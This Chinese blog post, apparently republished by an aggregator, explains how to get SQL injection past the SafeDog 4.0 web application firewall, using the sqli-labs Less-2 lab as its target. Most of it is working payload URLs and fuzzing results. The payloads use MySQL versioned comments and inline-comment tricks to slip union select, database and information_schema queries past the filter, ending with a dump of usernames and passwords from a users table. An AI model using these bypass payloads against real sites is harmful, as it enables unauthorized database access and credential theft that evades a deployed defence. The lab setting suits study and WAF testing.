sql注入bypass安全狗4.0
Posted cAr7n
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入bypass安全狗4.0相关的知识,希望对你有一定的参考价值。
安全狗4.0绕过:
拿sqllib第二关举例,因为是数字型注入,也就不用引入单引号
http://192.168.228.11/mysql/Less-2/?id=1
绕过空格
进行fuzz发现/**/内用以上字符可以实现绕过
绕过and
and 不拦截
and 1=1 拦截
and 1 拦截
1./!/配合版本号绕过
如果是/*xxx*/里面的xxx不执行
如果是/*!50000xxxx*/ 如果mysql版面大于5.00.00 后面的xxxx就会被直接执行
如果!后面不加版本号,后面的xxxx自动执行
/*小于当前mysql版本号1*/=/*小于当前mysql版本号1*/ --> 1=1
http://192.168.228.11/mysql/Less-2/?id=1 and /*!500001*/=/*!500001*/--+
2.if((1>2),1,2)
http://192.168.228.11/mysql/Less-2/?id=if((1>2),1,2)--+
3.用绕过空格的方法
http://192.168.228.11/mysql/Less-2/?id=1 and/*//*/1=1 --+
绕过order by
用绕过空格的方法实现绕过
payload:
http://192.168.228.11/mysql/Less-2/?id=1 order/*//*/by 3 --+
绕过union select
经过fuzz发现:
绕过空格的/*//*/也被拦截了
union 不拦截
union a 不拦截
select 不拦截
a select 不拦截
union select 拦截
使用版本号过滤:
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!500001select*//*//*/1,2,3--+
还是显示拦截
进行fuzz发现/*!*/内用以上字符可以实现绕过
payload:
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50044select*//*//*/1,2,3--+
查询当前用户
user 不拦截
user() 拦截
user(/*//*/) 不拦截
查询当前数据库
database 不拦截
database() 拦截
database(/*//*/) 不拦截
查询当前数据库的表
group_concat(table_name) 不拦截
from 不拦截
information_schema.tables 不拦截
where 不拦截
table_schema 不拦截
但最后输出被拦截
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50044select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database(/*//*/) --+
再fuzz一下select里面的参数
发现为50440-50449时可以实现绕过
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database(/*//*/) --+
或者表名用16进制表示
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(table_name) ,3 from information_schema.tables where table_schema=0x7365637572697479 --+
查询表中字段
与获取当前数据的表一致
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(column_name) ,3 from information_schema.columns where table_schema=database(/*//*/) --+
查询字段值
与前几个差不多
http://192.168.228.11/mysql/Less-2/?id=-1 union/*//*//*!50440select*//*//*/1,group_concat(username,\'-\',password) ,3 from users --+
以上是关于sql注入bypass安全狗4.0的主要内容,如果未能解决你的问题,请参考以下文章